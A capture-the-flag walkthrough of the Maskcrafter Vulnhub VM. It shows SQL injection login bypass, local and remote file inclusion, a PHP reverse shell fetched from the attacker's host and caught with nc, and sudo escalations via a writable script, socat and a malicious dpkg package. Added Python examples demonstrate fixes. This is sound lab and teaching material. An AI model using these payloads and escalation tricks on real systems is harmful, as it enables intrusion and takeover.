Maskcrafter
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:06 1 60 Unknown vendor
192.168.56.100 08:00:27:4c:3f:93 1 60 PCS Systemtechnik GmbH
192.168.56.254 08:00:27:1c:48:cc 1 60 PCS Systemtechnik GmbH
Using netdiscover on Kali Linux, the target host's IP address is identified as 192.168.56.254.
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-09 19:59 EDT
Nmap scan report for www.armour.local (192.168.56.254)
Host is up (0.000073s latency).
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 112 115 4096 Mar 30 2020 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.56.206
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8f1b43230a248c66ad3da2b969334dd7 (RSA)
| 256 8a2c857c2d9622f698f24ab67a88df23 (ECDSA)
|_ 256 aca799159cbf6944d9c2962a8f799b6d (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/debug
| http-title: Maskcrafter(TM) Login Page
|_Requested resource was login.php
|_http-server-header: Apache/2.4.29 (Ubuntu)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 35771/tcp6 mountd
| 100005 1,2,3 35951/udp mountd
| 100005 1,2,3 47498/udp6 mountd
| 100005 1,2,3 50685/tcp mountd
| 100021 1,3,4 45195/tcp6 nlockmgr
| 100021 1,3,4 46199/tcp nlockmgr
| 100021 1,3,4 48207/udp6 nlockmgr
| 100021 1,3,4 53602/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
38041/tcp open mountd 1-3 (RPC #100005)
45351/tcp open mountd 1-3 (RPC #100005)
46199/tcp open nlockmgr 1-4 (RPC #100021)
50685/tcp open mountd 1-3 (RPC #100005)
MAC Address: 08:00:27:1C:48:CC (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.48 seconds
Getting a shell
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ ftp 192.168.56.254
Connected to 192.168.56.254.
220 Welcome to maskcrafter(TM) FTP service.
Name (192.168.56.254:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||28847|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 115 4096 Mar 21 2020 .
drwxr-xr-x 3 0 115 4096 Mar 21 2020 ..
drwxr-xr-x 2 112 115 4096 Mar 30 2020 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||63424|)
150 Here comes the directory listing.
drwxr-xr-x 2 112 115 4096 Mar 30 2020 .
drwxr-xr-x 3 0 115 4096 Mar 21 2020 ..
-rw-r--r-- 1 0 0 430 Mar 30 2020 NOTES.txt
-rw-r--r-- 1 0 0 229 Mar 23 2020 cred.zip
226 Directory send OK.
ftp> get NOTES.txt
local: NOTES.txt remote: NOTES.txt
229 Entering Extended Passive Mode (|||15955|)
150 Opening BINARY mode data connection for NOTES.txt (430 bytes).
100% |********************************************************************************| 430 273.03 KiB/s 00:00 ETA
226 Transfer complete.
430 bytes received in 00:00 (224.31 KiB/s)
ftp> get cred.zip
local: cred.zip remote: cred.zip
229 Entering Extended Passive Mode (|||30982|)
150 Opening BINARY mode data connection for cred.zip (229 bytes).
100% |********************************************************************************| 229 427.59 KiB/s 00:00 ETA
226 Transfer complete.
229 bytes received in 00:00 (197.90 KiB/s)
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ cat NOTES.txt
Dear Web Administrator,
I've got a few points to make:
1.) Please choose a stronger password for /debug web-directory.
Having a username as 'admin' is already guessable but selecting a dictionary password is a big NO-NO.
2.) Please revisit the SQL code to prevent SQL injections because the way it is now, it is absolutely terrible.
Basically, we are hoping and praying that no hacker ever finds out about this.
Regards,
Root
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ ls -alh
total 20K
drwxr-xr-x 2 kali kali 4.0K Apr 9 20:00 .
drwxr-xr-x 83 kali kali 4.0K Apr 9 19:54 ..
-rw-r--r-- 1 kali kali 229 Mar 23 2020 cred.zip
-rw-r--r-- 1 root root 2.7K Apr 9 19:59 nmap_full_scan
-rw-r--r-- 1 kali kali 430 Mar 29 2020 NOTES.txt
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ unzip cred.zip
Archive: cred.zip
[cred.zip] cred.txt password:
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ zip2john cred.zip > hashes
ver 1.0 efh 5455 efh 7875 cred.zip/cred.txt PKZIP Encr: 2b chk, TS_chk, cmplen=47, decmplen=35, crc=5D29BC84 ts=63CD cs=63cd type=0
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2023-04-09 20:00) 0g/s 9562Kp/s 95
john did not crack the cred.zip password with rockyou, and the author has hinted that brute-forcing is not the intended route, so we move on.
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ showmount -e 192.168.56.254
Export list for 192.168.56.254:
The target exports no NFS shares, even though nfs and mountd are registered with rpcbind.
Browsing to port 80 from Kali Linux shows a user login page. It can be bypassed with a classic SQL injection in the username field: admin' or 1=1 -- (note the trailing space after the two hyphens, which MySQL requires for the comment to take effect).
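As an added example (not code from the walkthrough or from the VM), the following Python script reproduces the bypass against an in-memory SQLite table standing in for the target's login table, and shows the parameterised query that stops it. The column names and the stored password are assumptions made for the demo.

```python
import sqlite3

# Added example. An in-memory SQLite table stands in for the target's MySQL
# "login" table (table name taken from the page; columns are an assumption).


def make_db():
    """Constructed sample table: one account with a non-dictionary password."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE login (username TEXT, password TEXT)")
    db.execute("INSERT INTO login VALUES ('admin', 'c0rrect-horse-battery')")
    return db


def build_vulnerable_query(username, password):
    """String concatenation: the pattern NOTES.txt calls 'absolutely terrible'."""
    return ("SELECT username FROM login WHERE username = '" + username
            + "' AND password = '" + password + "'")


def login_vulnerable(db, username, password):
    """Runs the concatenated query; the attacker's quote ends the string early
    and '-- ' comments out the password check."""
    row = db.execute(build_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def login_fixed(db, username, password):
    """Same query with bound parameters: the input is data, never SQL syntax."""
    row = db.execute(
        "SELECT username FROM login WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def demo():
    db = make_db()
    payload = "admin' or 1=1 -- "  # the payload used on the page
    return {
        "query": build_vulnerable_query(payload, "x"),
        "vulnerable": login_vulnerable(db, payload, "x"),
        "fixed": login_fixed(db, payload, "x"),
        "fixed_real_creds": login_fixed(db, "admin", "c0rrect-horse-battery"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=>", value)
```

The concatenated query becomes SELECT username FROM login WHERE username = 'admin' or 1=1 -- ' AND password = 'x', which matches every row; with placeholders the whole payload is compared as a literal username and the login fails.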
After logging in, the page source contains these comments:
This webpage was created out of urgency and as such some features are still buggy and may not work as intended.
DB connection ok.
Development in progress, please report any bugs to admin@covid19.localhost
Due to the increase demand for our product, you are to ramp up your productivity by 200%, else suffer a pay cut!Employee page Welcome admin' or 1=1 -- !
Logout
Follow the link found in the comment.
Visiting the URL below returns the same page, but the page parameter is worth a closer look: it may be vulnerable to local file inclusion.
http://192.168.56.254/index.php?page=warning.php
http://192.168.56.254/index.php?page=../../../../../etc/passwd
Visiting the second URL returns the contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
userx:x:1000:1000:userx:/home/userx:/bin/bash
mysql:x:111:113:MySQL Server,,,:/nonexistent:/bin/false
researcherx:x:1001:1001:,,,:/home/researcherx:/bin/bash
ftp:x:112:115:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
statd:x:113:65534::/var/lib/nfs:/usr/sbin/nologin
evdaez:x:1002:1002:,,,:/home/evdaez:/bin/bash
Next, test whether remote file inclusion is possible as well:
Start an HTTP server on Kali Linux (port 8000, as in the URL below) serving a small test file, then ask index.php to include it.
http://192.168.56.254/index.php?page=http://192.168.56.206:8000/test.txt
The response contains the test file's content:
jason,great
This confirms the target is vulnerable to remote file inclusion (for PHP's include() to fetch a URL, allow_url_include must be enabled, which it evidently is here).
Next, host a PHP reverse shell on Kali Linux that connects back to port 5555, include it through the same parameter, and catch the connection with nc.
http://192.168.56.254/index.php?page=http://192.168.56.206:8000/shell.php
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 39276
Linux maskcrafter 4.15.0-91-generic #92-Ubuntu SMP Fri Feb 28 11:09:48 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 08:15:22 up 17 min,  0 users,  load average: 0.00, 0.00, 0.02
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@maskcrafter:/$
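The include bug behind both the LFI and the RFI is the same: index.php passes the page parameter straight to include(). As an added example (not code from the walkthrough or the VM), this Python script models that resolver in two versions, one behaving like a bare include with allow_url_include on, the other restricted to an allowlist and checked against the web root. The web-root layout, the page names in the allowlist and the fake /etc/passwd are constructed for the demo.

```python
import os
import tempfile
from urllib.parse import urlsplit

# Added example. Models index.php?page=... with a vulnerable and a hardened
# resolver. Nothing is fetched over the network; a URL is only reported.

ALLOWED_PAGES = {"warning.php", "employee.php"}  # assumption: the only pages index.php should load


def make_web_root():
    """Build <tmp>/var/www/html with one page, and <tmp>/etc/passwd outside it."""
    base = tempfile.mkdtemp()
    root = os.path.join(base, "var", "www", "html")
    os.makedirs(root)
    with open(os.path.join(root, "warning.php"), "w") as f:
        f.write("<p>warning page</p>")
    os.makedirs(os.path.join(base, "etc"))
    with open(os.path.join(base, "etc", "passwd"), "w") as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")  # constructed stand-in
    return root


def include_vulnerable(root, page):
    """Whatever the client sends is used as a path or a URL, like include($_GET['page'])."""
    if urlsplit(page).scheme in ("http", "https", "ftp"):
        # A real PHP include would fetch and *execute* the remote file; here we only report it.
        return "REMOTE:" + page
    with open(os.path.join(root, page)) as f:
        return f.read()


def include_fixed(root, page):
    """Reject URLs, reject anything not on the allowlist, and confirm the resolved
    path stays under the web root. Returns None when the request is refused."""
    if urlsplit(page).scheme:
        return None
    if page not in ALLOWED_PAGES:
        return None
    real_root = os.path.realpath(root)
    full = os.path.realpath(os.path.join(real_root, page))
    if os.path.commonpath([full, real_root]) != real_root:
        return None
    with open(full) as f:
        return f.read()


def demo():
    root = make_web_root()
    # The page's payload used five "../"; three are enough to climb out of
    # <tmp>/var/www/html here. On the real target extra "../" are harmless
    # because /.. is still /, which is why five also works there.
    lfi = "../../../etc/passwd"
    rfi = "http://192.168.56.206:8000/test.txt"
    return {
        "vuln_lfi": include_vulnerable(root, lfi),
        "vuln_rfi": include_vulnerable(root, rfi),
        "fixed_lfi": include_fixed(root, lfi),
        "fixed_rfi": include_fixed(root, rfi),
        "fixed_ok": include_fixed(root, "warning.php"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=>", value)
```

The allowlist alone already stops both payloads; the realpath containment check is kept as a second line of defence for the day someone adds a page name containing a slash to the list.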
Privilege escalation
www-data@maskcrafter:/var/www/html$ cat db.php
Connection failed -> " . mysqli_connect_error() . ""); }
echo "This webpage was created out of urgency and as such some features are still buggy and may not work as intended.";
echo "";
echo "DB connection ok.";
echo "";
echo "
";
db.php holds the database connection credentials, which also work for the mysql client:
www-data@maskcrafter:/home$ mysql -uweb -p
Enter password: P@ssw0rdweb
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 59
Server version: 5.7.29-0ubuntu0.18.04.1 (Ubuntu)

Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mydatabase         |
| mysql              |
| performance_schema |
| phpmyadmin         |
| sys                |
+--------------------+
6 rows in set (0.01 sec)

mysql> use mydatabase;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+----------------------+
| Tables_in_mydatabase |
+----------------------+
| creds                |
| login                |
+----------------------+
2 rows in set (0.00 sec)

mysql> select * from creds;
+----+--------------+-------------+
| id | data_type    | password    |
+----+--------------+-------------+
|  1 | zip password | cred12345!! |
+----+--------------+-------------+
1 row in set (0.00 sec)

mysql>
This should be the password for cred.zip downloaded earlier from the FTP server.
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ unzip cred.zip
Archive:  cred.zip
[cred.zip] cred.txt password:
 extracting: cred.txt
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ cat cred.txt
userx:thisismypasswordforuserx2020
This gives userx's password; switch the shell to that user and check its sudo rights.
userx@maskcrafter:~$ sudo -l
Matching Defaults entries for userx on maskcrafter:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User userx may run the following commands on maskcrafter:
    (evdaez) NOPASSWD: /scripts/whatsmyid.sh
userx@maskcrafter:~$ ls -alh /scripts/whatsmyid.sh
-rwxr-xr-x 1 userx userx 15 Mar 30  2020 /scripts/whatsmyid.sh
userx@maskcrafter:~$ cat /scripts/whatsmyid.sh
#!/bin/bash
id
userx@maskcrafter:~$ echo '/bin/bash' >> /scripts/whatsmyid.sh
userx@maskcrafter:~$ sudo -u evdaez /scripts/whatsmyid.sh
uid=1002(evdaez) gid=1002(evdaez) groups=1002(evdaez)
bash: /home/userx/.bashrc: Permission denied
evdaez@maskcrafter:~$ id
uid=1002(evdaez) gid=1002(evdaez) groups=1002(evdaez)
Successfully switched to user evdaez. The sudo rule looks harmless, but the script it points to is owned and writable by userx, so userx can append any command to it and have sudo run that command as evdaez.
evdaez@maskcrafter:/home/evdaez$ sudo -l
Matching Defaults entries for evdaez on maskcrafter:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User evdaez may run the following commands on maskcrafter:
    (researcherx) NOPASSWD: /usr/bin/socat
evdaez@maskcrafter:/home/evdaez$ sudo -u researcherx /usr/bin/socat stdin exec:/bin/sh
Using socat's exec: address, we get a shell as researcherx. That shell has no tty and prints no prompt, so the commands in the next block appear without one.
cd /tmp
TF=$(mktemp -d)
echo 'exec /bin/sh' > $TF/x.sh
fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF
Doing `require 'backports'` is deprecated and will not load any backport in the next major release. Require just the needed backports instead, or 'backports/latest'.
{:timestamp=>"2023-04-10T08:42:18.755150+0000", :message=>"Debian packaging tools generally labels all files in /etc as config files, as mandated by policy, so fpm defaults to this behavior for deb packages. You can disable this default behavior with --deb-no-default-config-files flag", :level=>:warn}
{:timestamp=>"2023-04-10T08:42:18.786663+0000", :message=>"Created package", :path=>"x_1.0_all.deb"}
sudo /usr/bin/dpkg -i x_1.0_all.deb
(Reading database ... 96141 files and directories currently installed.)
Preparing to unpack x_1.0_all.deb ...
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls -alh
total 88K
drwx------  9 root root 4.0K Mar 30  2020 .
drwxr-xr-x 28 root root 4.0K Mar 30  2020 ..
-rw-r--r--  1 root root   39 Mar 20  2020 .bash_aliases
lrwxrwxrwx  1 root root    9 Mar 20  2020 .bash_history -> /dev/null
-rw-r--r--  1 root root 3.1K Mar 20  2020 .bashrc
drwx------  2 root root 4.0K Mar 21  2020 .cache
-rw-r--r--  1 root root   22 Mar 20  2020 .gdbinit
drwxr-xr-x  3 root root 4.0K Mar 20  2020 .gem
drwx------  3 root root 4.0K Mar 21  2020 .gnupg
-rw-------  1 root root   38 Mar 20  2020 .lesshst
drwxr-xr-x  3 root root 4.0K Mar 20  2020 .local
drwxr-xr-x  4 root root 4.0K Mar 20  2020 peda
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   75 Mar 23  2020 root.txt
-rw-r--r--  1 root root   75 Mar 20  2020 .selected_editor
drwx------  2 root root 4.0K Mar 20  2020 .ssh
drwxr-xr-x  2 root root 4.0K Mar 21  2020 .vim
-rw-------  1 root root  20K Mar 30  2020 .viminfo
-rw-r--r--  1 root root  215 Mar 21  2020 .wget-hsts
cat root.txt
Congrats on finishing this VM... Please tweet me your walkthrough @evdaez
researcherx can run dpkg through sudo, and dpkg executes a package's pre-install script as root, so a .deb built with fpm whose --before-install script is exec /bin/sh drops straight into a root shell. That gives root and the root flag.
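Every hop on this box after the web shell came from a sudo rule that was either pointed at a file the caller controls (/scripts/whatsmyid.sh) or at a binary that will hand over a shell (socat, dpkg). As an added example (not part of the original walkthrough), the following Python script automates that triage: it parses sudo -l output, checks whether the caller can write each target by its mode bits, and flags known shell-spawning binaries. The spawner list is an assumption drawn from GTFOBins-style knowledge, and the sample sudo -l text is constructed from the rules seen on the page plus an assumed dpkg rule for researcherx, which the page exercises but never lists.

```python
import os
import re
import stat
import tempfile

# Added example. Triage `sudo -l` output for two abusable patterns seen on
# Maskcrafter: a writable target script and a shell-spawning binary.

# Assumption: binaries that give the caller a shell when run via sudo as
# another user (GTFOBins-style list, not something the VM states).
SHELL_SPAWNERS = {"socat", "dpkg", "apt", "apt-get", "vim", "vi", "less", "more",
                  "find", "awk", "python", "python3", "perl", "env", "bash", "sh"}

# "(runas) TAG: TAG: /path/one, /path/two" ; the Defaults lines never match.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Return one {runas, tags, cmd} dict per command in `sudo -l` output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = m.group("tags").replace(":", "").split()
        for spec in m.group("cmds").split(","):
            cmd = spec.strip().split()[0]  # drop any fixed arguments
            rules.append({"runas": m.group("runas").strip(), "tags": tags, "cmd": cmd})
    return rules


def writable_by(path, uid, gids):
    """Mode-bit check: can this uid (with these gids) write `path`?
    Deliberately not os.access(), which answers yes to everything when run as root."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return False
    if st.st_uid == uid and st.st_mode & stat.S_IWUSR:
        return True
    if st.st_gid in gids and st.st_mode & stat.S_IWGRP:
        return True
    return bool(st.st_mode & stat.S_IWOTH)


def assess(sudo_output, uid, gids):
    """List (command, run-as user, reason) for every rule that looks abusable."""
    findings = []
    for r in parse_sudo_l(sudo_output):
        if r["cmd"] == "ALL":
            findings.append((r["cmd"], r["runas"], "unrestricted command"))
        elif writable_by(r["cmd"], uid, gids):
            findings.append((r["cmd"], r["runas"], "target file is writable by the caller"))
        elif os.path.basename(r["cmd"]) in SHELL_SPAWNERS:
            findings.append((r["cmd"], r["runas"], "binary can spawn a shell"))
    return findings


def flagged_basenames(findings):
    return {os.path.basename(cmd) for cmd, _, _ in findings}


def demo():
    """Constructed `sudo -l` text modelled on the rules met on the page. The
    writable script is created in a temp dir so the file check is real; a
    read-only copy is included as a control case."""
    d = tempfile.mkdtemp()
    script = os.path.join(d, "whatsmyid.sh")
    with open(script, "w") as f:
        f.write("#!/bin/bash\nid\n")
    os.chmod(script, 0o755)  # owner-writable, like the real /scripts/whatsmyid.sh
    safe = os.path.join(d, "safe.sh")
    with open(safe, "w") as f:
        f.write("#!/bin/bash\nid\n")
    os.chmod(safe, 0o555)  # control: no write bit for anyone
    sudo_l = f"""Matching Defaults entries for userx on maskcrafter:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User userx may run the following commands on maskcrafter:
    (evdaez) NOPASSWD: {script}
    (evdaez) NOPASSWD: {safe}
    (researcherx) NOPASSWD: /usr/bin/socat
    (root) /usr/bin/dpkg
"""
    return assess(sudo_l, os.getuid(), {os.getgid()})


if __name__ == "__main__":
    for cmd, runas, reason in demo():
        print(f"{cmd} (as {runas}): {reason}")
```

On a real host, feed it the output of sudo -l and the ids from os.getuid()/os.getgroups(); the writable-target check is the one that catches the whatsmyid.sh case, which no fixed binary list would.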